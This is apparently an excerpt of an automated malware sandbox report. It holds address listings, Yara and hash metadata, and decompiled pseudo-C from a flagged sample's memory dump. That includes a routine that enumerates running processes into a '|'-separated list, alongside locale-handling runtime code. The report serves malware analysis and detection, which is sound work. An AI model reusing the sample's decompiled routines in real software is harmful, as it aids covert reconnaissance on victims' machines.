                                    0x0044e35a
                                    0x0044e362
                                    0x0044e365
                                    0x0044e365
                                    0x0044e36b
                                    0x0044e36d
                                    0x0044e36f
                                    0x0044e376
                                    0x0044e37c
                                    0x0044e37e
                                    0x00000000
                                    0x0044e37e
                                    0x00000000
                                    0x0044e350
                                    0x00000000
                                    0x0044e349
                                    0x00000000
                                    0x0044e2ed
                                    0x0044e2b0
                                    0x0044e2b0
                                    0x0044e2b2
                                    0x0044e2b8
                                    0x0044e2bf
                                    0x0044e2bf
                                    0x0044e2c2
                                    0x0044e2c2
                                    0x00000000
                                    0x0044e2b2
                                    0x00000000
                                    0x0044e396
                                    0x0044e396
                                    0x0044e397
                                    0x0044e397
                                    0x00000000
                                    0x0044e29c
                                    0x0044e1b7
                                    0x0044e1b7
                                    0x0044e1c2
                                    0x0044e1c9
                                    0x0044e1cf
                                    0x0044e1d6
                                    0x0044e1d7
                                    0x0044e1d8
                                    0x0044e1dd
                                    0x0044e1e0
                                    0x0044e1e2
                                    0x00000000
                                    0x0044e1e8
                                    0x0044e1e8
                                    0x0044e1eb
                                    0x00000000
                                    0x0044e1f1
                                    0x0044e1f1
                                    0x0044e1f8
                                    0x00000000
                                    0x0044e1fe
                                    0x0044e204
                                    0x0044e206
                                    0x0044e20c
                                    0x0044e20c
                                    0x0044e20e
                                    0x0044e20e
                                    0x0044e210
                                    0x0044e219
                                    0x0044e220
                                    0x0044e223
                                    0x0044e224
                                    0x0044e226
                                    0x0044e226
                                    0x00000000
                                    0x0044e22e
                                    0x0044e1f8
                                    0x0044e1eb
                                    0x0044e1e2
                                    0x0044e11b
                                    0x0044e11b
                                    0x0044e121
                                    0x0044e123
                                    0x0044e13f
                                    0x0044e142
                                    0x00000000
                                    0x0044e148
                                    0x0044e148
                                    0x0044e14f
                                    0x00000000
                                    0x0044e155
                                    0x0044e15b
                                    0x0044e15d
                                    0x0044e163
                                    0x0044e163
                                    0x0044e165
                                    0x0044e165
                                    0x0044e167
                                    0x0044e170
                                    0x0044e177
                                    0x0044e17a
                                    0x0044e17b
                                    0x0044e17d
                                    0x0044e17d
                                    0x0044e185
                                    0x0044e185
                                    0x0044e187
                                    0x00000000
                                    0x0044e18d
                                    0x0044e18d
                                    0x0044e193
                                    0x0044e196
                                    0x0044e460
                                    0x0044e462
                                    0x0044e463
                                    0x0044e469
                                    0x0044e475
                                    0x0044e47c
                                    0x0044e47d
                                    0x0044e47e
                                    0x0044e483
                                    0x0044e486
                                    0x0044e19c
                                    0x0044e19c
                                    0x0044e1a3
                                    0x00000000
                                    0x0044e1a3
                                    0x0044e196
                                    0x0044e187
                                    0x0044e14f
                                    0x0044e125
                                    0x0044e125
                                    0x0044e127
                                    0x0044e12d
                                    0x0044e133
                                    0x0044e134
                                    0x0044e3b1
                                    0x0044e3b1
                                    0x0044e3b8
                                    0x0044e3b9
                                    0x0044e3ba
                                    0x0044e3bf
                                    0x0044e3c2
                                    0x0044e3c2
                                    0x0044e3c2
                                    0x0044e123
                                    0x0044e3c4
                                    0x0044e3c4
                                    0x0044e3c6
                                    0x0044e48d
                                    0x0044e494
                                    0x0044e49b
                                    0x0044e4ae
                                    0x0044e4b4
                                    0x0044e4b5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044e3cc
                                    0x0044e3d2
                                    0x0044e3d2
                                    0x0044e3d8
                                    0x0044e3d8
                                    0x0044e3e4
                                    0x00000000
                                    0x0044e3e4
                                    0x0044dc21
                                    0x0044dc21
                                    0x0044dc23
                                    0x0044dc29
                                    0x0044dc2b
                                    0x0044dc31
                                    0x0044dc33
                                    0x0044dfaa
                                    0x0044dfaa
                                    0x0044dfac
                                    0x0044dfb2
                                    0x0044dfb9
                                    0x0044dfbb
                                    0x0044e01a
                                    0x0044e01d
                                    0x0044e023
                                    0x0044e029
                                    0x0044e02f
                                    0x0044e031
                                    0x0044e037
                                    0x0044e039
                                    0x0044e039
                                    0x0044e03b
                                    0x0044e03b
                                    0x0044e03d
                                    0x0044e046
                                    0x0044e04d
                                    0x0044e050
                                    0x0044e051
                                    0x0044e053
                                    0x0044e053
                                    0x0044e05b
                                    0x0044e05d
                                    0x0044e063
                                    0x0044e069
                                    0x0044e06c
                                    0x00000000
                                    0x0044e072
                                    0x0044e072
                                    0x0044e079
                                    0x0044e079
                                    0x0044e06c
                                    0x0044e05d
                                    0x0044e031
                                    0x0044dfbd
                                    0x0044dfbd
                                    0x0044dfbf
                                    0x0044dfc5
                                    0x0044dfcb
                                    0x00000000
                                    0x0044dfcb
                                    0x0044dfbb
                                    0x0044dc39
                                    0x0044dc39
                                    0x0044dc39
                                    0x0044dc3c
                                    0x0044dc40
                                    0x0044dc40
                                    0x0044dc41
                                    0x0044dc53
                                    0x0044dc60
                                    0x0044dc6f
                                    0x0044dc99
                                    0x0044dc9e
                                    0x0044dca4
                                    0x0044dca7
                                    0x0044dcad
                                    0x0044dcb0
                                    0x0044dd2c
                                    0x0044dd33
                                    0x0044ddf7
                                    0x0044ddfd
                                    0x0044de03
                                    0x0044de06
                                    0x0044de08
                                    0x0044de91
                                    0x0044de0e
                                    0x0044de0e
                                    0x0044de14
                                    0x0044de14
                                    0x0044de1a
                                    0x0044de20
                                    0x0044de22
                                    0x0044de24
                                    0x0044de24
                                    0x0044de2a
                                    0x0044de30
                                    0x0044de32
                                    0x0044de3a
                                    0x0044de3a
                                    0x0044de40
                                    0x0044de42
                                    0x0044de44
                                    0x0044de4a
                                    0x0044de4c
                                    0x0044df63
                                    0x0044df65
                                    0x0044df6b
                                    0x0044df6b
                                    0x00000000
                                    0x0044de52
                                    0x0044de58
                                    0x0044de58
                                    0x0044de5a
                                    0x0044de60
                                    0x0044de63
                                    0x0044de6a
                                    0x0044de70
                                    0x0044de72
                                    0x0044de99
                                    0x0044de9b
                                    0x0044de9d
                                    0x0044de9f
                                    0x0044dea5
                                    0x0044deab
                                    0x0044df45
                                    0x0044df45
                                    0x0044df48
                                    0x00000000
                                    0x0044df4e
                                    0x0044df4e
                                    0x0044df54
                                    0x00000000
                                    0x0044df54
                                    0x0044deb1
                                    0x0044deb1
                                    0x0044deb1
                                    0x0044deb4
                                    0x00000000
                                    0x00000000
                                    0x0044deb6
                                    0x0044deb8
                                    0x0044deba
                                    0x0044dec3
                                    0x0044dec3
                                    0x0044dec5
                                    0x0044decb
                                    0x0044decb
                                    0x0044ded7
                                    0x0044dee2
                                    0x0044dee5
                                    0x0044def2
                                    0x0044def5
                                    0x0044def6
                                    0x0044def7
                                    0x0044defd
                                    0x0044deff
                                    0x0044df05
                                    0x0044df0b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044df0d
                                    0x0044df0d
                                    0x0044df0d
                                    0x0044df0f
                                    0x00000000
                                    0x00000000
                                    0x0044df11
                                    0x0044df14
                                    0x0044dfce
                                    0x0044dfce
                                    0x0044dfd0
                                    0x0044dfd6
                                    0x0044dfdc
                                    0x0044dfdd
                                    0x00000000
                                    0x0044df1a
                                    0x0044df1a
                                    0x0044df1c
                                    0x0044df1e
                                    0x0044df1e
                                    0x0044df1e
                                    0x0044df26
                                    0x0044df29
                                    0x0044df29
                                    0x0044df2f
                                    0x0044df31
                                    0x0044df33
                                    0x0044df3a
                                    0x0044df40
                                    0x0044df42
                                    0x00000000
                                    0x0044df42
                                    0x00000000
                                    0x0044df14
                                    0x00000000
                                    0x0044df0d
                                    0x00000000
                                    0x0044deb1
                                    0x0044de74
                                    0x0044de74
                                    0x0044de76
                                    0x0044de7c
                                    0x0044de83
                                    0x0044de83
                                    0x0044de86
                                    0x0044de86
                                    0x00000000
                                    0x0044de76
                                    0x00000000
                                    0x0044df5a
                                    0x0044df5a
                                    0x0044df5b
                                    0x0044df5b
                                    0x00000000
                                    0x0044de60
                                    0x0044dd39
                                    0x0044dd39
                                    0x0044dd44
                                    0x0044dd4b
                                    0x0044dd51
                                    0x0044dd58
                                    0x0044dd59
                                    0x0044dd5a
                                    0x0044dd5f
                                    0x0044dd62
                                    0x0044dd64
                                    0x0044dd80
                                    0x0044dd83
                                    0x00000000
                                    0x0044dd89
                                    0x0044dd89
                                    0x0044dd90
                                    0x00000000
                                    0x0044dd96
                                    0x0044dd9c
                                    0x0044dd9e
                                    0x0044dda4
                                    0x0044dda4
                                    0x0044dda6
                                    0x0044dda6
                                    0x0044dda8
                                    0x0044ddb1
                                    0x0044ddb8
                                    0x0044ddbb
                                    0x0044ddbc
                                    0x0044ddbe
                                    0x0044ddbe
                                    0x00000000
                                    0x0044dda6
                                    0x0044dd90
                                    0x0044dd66
                                    0x0044dd68
                                    0x0044dd6e
                                    0x0044dd74
                                    0x0044dd75
                                    0x00000000
                                    0x0044dd75
                                    0x0044dd64
                                    0x0044dcb2
                                    0x0044dcb2
                                    0x0044dcb8
                                    0x0044dcba
                                    0x0044dccf
                                    0x0044dcd2
                                    0x00000000
                                    0x0044dcd8
                                    0x0044dcd8
                                    0x0044dcdf
                                    0x00000000
                                    0x0044dce5
                                    0x0044dceb
                                    0x0044dced
                                    0x0044dcf3
                                    0x0044dcf3
                                    0x0044dcf5
                                    0x0044dcf5
                                    0x0044dcf7
                                    0x0044dd00
                                    0x0044dd07
                                    0x0044dd0a
                                    0x0044dd0b
                                    0x0044dd0d
                                    0x0044dd0d
                                    0x0044ddc6
                                    0x0044ddc6
                                    0x0044ddc8
                                    0x00000000
                                    0x0044ddce
                                    0x0044ddce
                                    0x0044ddd4
                                    0x0044ddd7
                                    0x0044dd1a
                                    0x0044dd21
                                    0x00000000
                                    0x0044dddd
                                    0x0044dddf
                                    0x0044dde5
                                    0x0044ddeb
                                    0x0044ddec
                                    0x0044dfe3
                                    0x0044dfe3
                                    0x0044dfea
                                    0x0044dfeb
                                    0x0044dfec
                                    0x0044dff1
                                    0x0044dff4
                                    0x0044dff4
                                    0x0044ddd7
                                    0x0044ddc8
                                    0x0044dcdf
                                    0x0044dcbc
                                    0x0044dcbc
                                    0x0044dcbe
                                    0x0044dcc4
                                    0x0044df6e
                                    0x0044df6e
                                    0x0044df6f
                                    0x0044df75
                                    0x0044df75
                                    0x0044df7c
                                    0x0044df7d
                                    0x0044df7e
                                    0x0044df83
                                    0x0044df86
                                    0x0044df86
                                    0x0044df86
                                    0x0044dcba
                                    0x0044df88
                                    0x0044df88
                                    0x0044df8a
                                    0x0044dff8
                                    0x0044dfff
                                    0x0044dfff
                                    0x0044dfff
                                    0x0044e006
                                    0x0044e008
                                    0x0044e00e
                                    0x0044e00f
                                    0x0044e4bb
                                    0x0044e4bb
                                    0x0044e4bc
                                    0x0044e4bd
                                    0x0044e4c2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044df8c
                                    0x0044df92
                                    0x0044df92
                                    0x0044df98
                                    0x0044df98
                                    0x0044dfa4
                                    0x00000000
                                    0x0044dfa4
                                    0x0044dc33
                                    0x0044e4c5
                                    0x0044e4c5
                                    0x0044e4cb
                                    0x0044e4cd
                                    0x0044e4d3
                                    0x0044e4d9
                                    0x0044e4db
                                    0x0044e4dd
                                    0x0044e4df
                                    0x0044e4df
                                    0x0044e4e1
                                    0x0044e4e1
                                    0x0044e4ea
                                    0x0044e4eb
                                    0x0044e4ef
                                    0x0044e4f6
                                    0x0044e4f9
                                    0x0044e4fa
                                    0x0044e4fc
                                    0x0044e4fc
                                    0x0044e500
                                    0x0044e506
                                    0x0044e508
                                    0x0044e50e
                                    0x0044e510
                                    0x0044e516
                                    0x0044e519
                                    0x0044e52c
                                    0x0044e52e
                                    0x0044e52f
                                    0x0044e535
                                    0x0044e541
                                    0x0044e548
                                    0x0044e549
                                    0x0044e54a
                                    0x0044e54f
                                    0x0044e51b
                                    0x0044e51d
                                    0x0044e524
                                    0x0044e524
                                    0x0044e519
                                    0x0044e552
                                    0x0044e552
                                    0x0044e562
                                    0x0044e56b
                                    0x0044e56c
                                    0x0044e56e
                                    0x0044e605
                                    0x0044e607
                                    0x0044e612
                                    0x0044e612
                                    0x0044e614
                                    0x0044e617
                                    0x0044e619
                                    0x00000000
                                    0x0044e609
                                    0x0044e60f
                                    0x0044e60f
                                    0x0044e574
                                    0x0044e574
                                    0x0044e57a
                                    0x0044e57d
                                    0x0044e583
                                    0x0044e586
                                    0x0044e58c
                                    0x0044e58e
                                    0x0044e594
                                    0x0044e596
                                    0x0044e598
                                    0x0044e598
                                    0x0044e59a
                                    0x0044e59a
                                    0x0044e5a7
                                    0x0044e5ae
                                    0x0044e5b1
                                    0x0044e5b2
                                    0x0044e5b4
                                    0x0044e5b5
                                    0x0044e5b5
                                    0x0044e5b9
                                    0x0044e5bf
                                    0x0044e5c1
                                    0x0044e5c3
                                    0x0044e5c9
                                    0x0044e5cc
                                    0x0044e5df
                                    0x0044e5e0
                                    0x0044e5e6
                                    0x0044e5f2
                                    0x0044e5f9
                                    0x0044e5fa
                                    0x0044e5fb
                                    0x0044e600
                                    0x0044e5ce
                                    0x0044e5ce
                                    0x0044e5d5
                                    0x0044e5d5
                                    0x0044e5cc
                                    0x0044e5c1
                                    0x0044e61f
                                    0x0044e61f
                                    0x0044e61f
                                    0x0044e62b
                                    0x0044e62e
                                    0x0044e634
                                    0x0044e636
                                    0x0044e638
                                    0x0044e63e
                                    0x0044e640
                                    0x0044e640
                                    0x0044e640
                                    0x0044e63e
                                    0x0044e645
                                    0x0044e646
                                    0x0044e648
                                    0x0044e64a
                                    0x0044e64a
                                    0x0044e64c
                                    0x0044e652
                                    0x0044e658
                                    0x0044e65a
                                    0x0044e660
                                    0x0044e660
                                    0x0044e666
                                    0x0044e668
                                    0x00000000
                                    0x00000000
                                    0x0044e66e
                                    0x0044e670
                                    0x0044e672
                                    0x0044e672
                                    0x0044e674
                                    0x0044e674
                                    0x0044e684
                                    0x0044e68b
                                    0x0044e68e
                                    0x0044e68f
                                    0x0044e691
                                    0x0044e691
                                    0x0044e695
                                    0x0044e69b
                                    0x0044e69d
                                    0x0044e69f
                                    0x0044e6a5
                                    0x0044e6a8
                                    0x0044e6b9
                                    0x0044e6bb
                                    0x0044e6bc
                                    0x0044e6c2
                                    0x0044e6ce
                                    0x0044e6d5
                                    0x0044e6d6
                                    0x0044e6d7
                                    0x0044e6dc
                                    0x0044e6aa
                                    0x0044e6aa
                                    0x0044e6b1
                                    0x0044e6b1
                                    0x0044e6a8
                                    0x0044e6ed
                                    0x0044e6fc
                                    0x0044e6fd
                                    0x0044e6fd
                                    0x0044e6ff
                                    0x0044e701
                                    0x0044e701
                                    0x0044e707
                                    0x0044e70a
                                    0x0044e70c
                                    0x0044e70e
                                    0x0044e70e
                                    0x0044e711
                                    0x0044e712
                                    0x0044e712
                                    0x0044e717
                                    0x0044e71a
                                    0x0044e71e
                                    0x0044e71e
                                    0x0044e71f
                                    0x0044e721
                                    0x0044e727
                                    0x0044e72d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044e72d
                                    0x0044e660
                                    0x0044e733
                                    0x0044e733
                                    0x00000000
                                    0x0044e733
                                    0x0044d4b8
                                    0x0044d4af
                                    0x0044d4a6
                                    0x0044d45d
                                    0x0044d461
                                    0x0044d469
                                    0x00000000
                                    0x0044d46b
                                    0x0044d471
                                    0x0044d476
                                    0x0044e752
                                    0x0044e752
                                    0x0044e755
                                    0x0044e760
                                    0x0044e78b
                                    0x0044e78c
                                    0x0044e78d
                                    0x0044e78e
                                    0x0044e78f
                                    0x0044e790
                                    0x0044e795
                                    0x0044e798
                                    0x0044e79b
                                    0x0044e79c
                                    0x0044e79f
                                    0x0044e7a1
                                    0x0044e7a7
                                    0x0044e7aa
                                    0x0044e7ac
                                    0x0044e7c1
                                    0x0044e7c2
                                    0x0044e7c5
                                    0x0044e7c7
                                    0x0044e7dd
                                    0x0044e7e3
                                    0x0044e7eb
                                    0x0044e7ed
                                    0x0044e7f8
                                    0x0044e7fb
                                    0x0044e812
                                    0x0044e7fd
                                    0x0044e7fd
                                    0x0044e802
                                    0x00000000
                                    0x0044e802
                                    0x0044e7ef
                                    0x0044e7ef
                                    0x0044e7f4
                                    0x0044e804
                                    0x0044e804
                                    0x0044e805
                                    0x0044e807
                                    0x0044e80c
                                    0x0044e80c
                                    0x0044e7c9
                                    0x0044e7c9
                                    0x0044e7cc
                                    0x00000000
                                    0x0044e7ce
                                    0x0044e7d1
                                    0x0044e7d9
                                    0x0044e7d9
                                    0x0044e7cc
                                    0x0044e7ae
                                    0x0044e7ae
                                    0x0044e7b5
                                    0x0044e7b6
                                    0x0044e7b8
                                    0x0044e7bd
                                    0x0044e7bd
                                    0x0044e7a3
                                    0x0044e7a3
                                    0x0044e7a3
                                    0x0044e816
                                    0x0044e762
                                    0x0044e762
                                    0x0044e762
                                    0x0044e76c
                                    0x0044e775
                                    0x0044e77a
                                    0x0044e788
                                    0x0044e788
                                    0x0044e760
                                    0x0044d469

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                    • Instruction ID: bf911c1a37dbfafd62c1db5ad45da0714cb81aa7e36eaf23024dd27f54a8ec40
                                    • Opcode Fuzzy Hash: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                    • Instruction Fuzzy Hash: D2C24872E086288FEB25CE299D407EAB7B5FB44305F1541EBD80DE7240E778AE818F45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D211, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040D211(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E004020D5(__ebx, __ecx);
				 *0x46beb4 = L00417614(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E0040427F(_t76,  &_v28,  &_v864);
						_t47 = E00417226(_t76,  &_v340, L00417642(_v892) & 0x000000ff);
						_t48 = E00417226(_t76,  &_v316, _v892);
						_t50 = E0041739C(_t76,  &_v268, L00417678( &_v292, _v892));
						L00401FD1(_t129, _t58, _t130, E00405343(_t76,  &_v52, L00402F1D( &_v76, E00405343(_t76,  &_v100, L00402F1D( &_v124, E00405343(_t76,  &_v148, L00402F1D( &_v172, E00405343(_t76,  &_v196, E004074F0(_t76,  &_v220, _t129, __eflags, E0041739C(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x46061c), _t50), _t129, __eflags, 0x46061c), _t48), _t129, __eflags, 0x46061c), _t47), _t129, __eflags, "|"));
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401EF0();
						L00401FC7();
						L00401FC7();
						L00401EF0();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}



























                                    0x0040d211
                                    0x0040d211
                                    0x0040d21c
                                    0x0040d21e
                                    0x0040d22c
                                    0x0040d237
                                    0x0040d23b
                                    0x0040d247
                                    0x0040d253
                                    0x0040d3d2
                                    0x0040d268
                                    0x0040d286
                                    0x0040d29d
                                    0x0040d2c1
                                    0x0040d342
                                    0x0040d34a
                                    0x0040d352
                                    0x0040d35a
                                    0x0040d362
                                    0x0040d36d
                                    0x0040d378
                                    0x0040d383
                                    0x0040d38e
                                    0x0040d399
                                    0x0040d3a4
                                    0x0040d3af
                                    0x0040d3ba
                                    0x0040d3c5
                                    0x0040d3cd
                                    0x0040d3cd
                                    0x0040d3e9
                                    0x0040d3e9
                                    0x0040d3f6

                                    APIs
                                      • Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
                                      • Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D231
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
                                    • CloseHandle.KERNEL32(00000000), ref: 0040D3E9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                    • String ID:
                                    • API String ID: 715332099-0
                                    • Opcode ID: cefc01ee75dd76c23d776ef3f1d742279f651e097c3a1724514ace9d7abc3bff
                                    • Instruction ID: 43f38b1539949543322e8b732d0e6a0d6251ec8b58a184f5b0d342f80c8325cc
                                    • Opcode Fuzzy Hash: cefc01ee75dd76c23d776ef3f1d742279f651e097c3a1724514ace9d7abc3bff
                                    • Instruction Fuzzy Hash: CD415D319142198BCB15FB66DC51AEEB375AF50304F1001BEB40AB61E2EF786F89DE58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044A343, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E0044A343(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				signed int _t58;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr _t75;
				signed int _t76;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t119;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;
				signed int* _t129;
				int _t132;
				signed int _t133;
				void* _t134;

				_t50 =  *0x46a00c; // 0xbd45ae92
				_v8 = _t50 ^ _t133;
				_t92 = L00441CE2(__ebx, __ecx, __edx);
				_t129 =  *(L00441CE2(_t92, __ecx, __edx) + 0x34c);
				_t132 = L0044A66B(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t129 & 0x00000300) - 0x300;
						if(( *_t129 & 0x00000300) == 0x300) {
							L39:
							__eflags =  !( *_t129 >> 2) & 0x00000001;
							L40:
							return L0042FD1B(_v8 ^ _t133);
						}
						asm("sbb ecx, ecx");
						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t67;
						if(_t67 != 0) {
							_t69 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
							__eflags = _t69;
							if(_t69 != 0) {
								__eflags =  *(_t92 + 0x60);
								if( *(_t92 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t92 + 0x5c);
								if( *(_t92 + 0x5c) == 0) {
									goto L39;
								}
								_t72 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
								__eflags = _t72;
								if(_t72 != 0) {
									goto L39;
								}
								_push(_t129);
								_t73 = L0044A7C3(0, _t132, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								__eflags = _t129[1];
								L37:
								if(__eflags == 0) {
									_t129[1] = _t132;
								}
								goto L39;
							}
							 *_t129 =  *_t129 | 0x00000200;
							_t123 =  *_t129;
							__eflags =  *(_t92 + 0x60) - _t69;
							if( *(_t92 + 0x60) == _t69) {
								__eflags =  *(_t92 + 0x5c) - _t69;
								if( *(_t92 + 0x5c) == _t69) {
									goto L23;
								}
								_t113 =  *((intOrPtr*)(_t92 + 0x50));
								_v256 = _t113 + 2;
								do {
									_t75 =  *_t113;
									_t113 = _t113 + 2;
									__eflags = _t75 - _v252;
								} while (_t75 != _v252);
								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
									_t69 = 0;
									goto L23;
								}
								_push(_t129);
								_t76 = L0044A7C3(_t92, _t132, 1);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								_t69 = 0;
								L24:
								__eflags = _t129[1] - _t69;
								goto L37;
							}
							L23:
							_t124 = _t123 | 0x00000100;
							__eflags = _t124;
							 *_t129 = _t124;
							goto L24;
						}
						 *_t129 = _t67;
						L2:
						goto L40;
					}
					asm("sbb eax, eax");
					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t84;
					if(_t84 == 0) {
						goto L1;
					}
					_t86 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
					_pop(_t117);
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t129 & 0x00000002;
						if(( *_t129 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t92 + 0x5c);
						if( *(_t92 + 0x5c) == 0) {
							L14:
							_t125 =  *_t129;
							__eflags = _t125 & 0x00000001;
							if((_t125 & 0x00000001) != 0) {
								goto L18;
							}
							_t87 = L0044A79F(_t132);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t126 = _t125 | 0x00000001;
							__eflags = _t126;
							 *_t129 = _t126;
							goto L17;
						}
						_t89 = L0043B6DE(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
						_t134 = _t134 + 0xc;
						__eflags = _t89;
						if(_t89 != 0) {
							goto L14;
						}
						 *_t129 =  *_t129 | 0x00000002;
						__eflags =  *_t129;
						_t129[2] = _t132;
						_t119 =  *((intOrPtr*)(_t92 + 0x50));
						_t127 = _t119 + 2;
						do {
							_t90 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t90 - _v252;
						} while (_t90 != _v252);
						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
							_t129[1] = _t132;
						}
					} else {
						 *_t129 =  *_t129 | 0x00000304;
						_t129[1] = _t132;
						L17:
						_t129[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t129 =  *_t129 & 0x00000000;
				goto L2;
			}


































                                    0x0044a34e
                                    0x0044a355
                                    0x0044a363
                                    0x0044a36b
                                    0x0044a37a
                                    0x0044a386
                                    0x0044a39f
                                    0x0044a3b6
                                    0x0044a3bb
                                    0x0044a3c4
                                    0x0044a3c6
                                    0x0044a479
                                    0x0044a482
                                    0x0044a484
                                    0x0044a576
                                    0x0044a57d
                                    0x0044a580
                                    0x0044a590
                                    0x0044a590
                                    0x0044a497
                                    0x0044a4a8
                                    0x0044a4ae
                                    0x0044a4b0
                                    0x0044a4c3
                                    0x0044a4ca
                                    0x0044a4cc
                                    0x0044a538
                                    0x0044a53b
                                    0x00000000
                                    0x00000000
                                    0x0044a53d
                                    0x0044a540
                                    0x00000000
                                    0x00000000
                                    0x0044a54c
                                    0x0044a553
                                    0x0044a555
                                    0x00000000
                                    0x00000000
                                    0x0044a557
                                    0x0044a55c
                                    0x0044a564
                                    0x0044a566
                                    0x00000000
                                    0x00000000
                                    0x0044a568
                                    0x0044a56e
                                    0x0044a571
                                    0x0044a571
                                    0x0044a573
                                    0x0044a573
                                    0x00000000
                                    0x0044a571
                                    0x0044a4ce
                                    0x0044a4d4
                                    0x0044a4d6
                                    0x0044a4d9
                                    0x0044a4eb
                                    0x0044a4ee
                                    0x00000000
                                    0x00000000
                                    0x0044a4f0
                                    0x0044a4f6
                                    0x0044a4fc
                                    0x0044a4fc
                                    0x0044a4ff
                                    0x0044a502
                                    0x0044a502
                                    0x0044a513
                                    0x0044a516
                                    0x0044a532
                                    0x00000000
                                    0x0044a532
                                    0x0044a518
                                    0x0044a51c
                                    0x0044a524
                                    0x0044a526
                                    0x00000000
                                    0x00000000
                                    0x0044a528
                                    0x0044a52e
                                    0x0044a4e3
                                    0x0044a4e3
                                    0x00000000
                                    0x0044a4e3
                                    0x0044a4db
                                    0x0044a4db
                                    0x0044a4db
                                    0x0044a4e1
                                    0x00000000
                                    0x0044a4e1
                                    0x0044a4b2
                                    0x0044a3a4
                                    0x00000000
                                    0x0044a3a6
                                    0x0044a3da
                                    0x0044a3e8
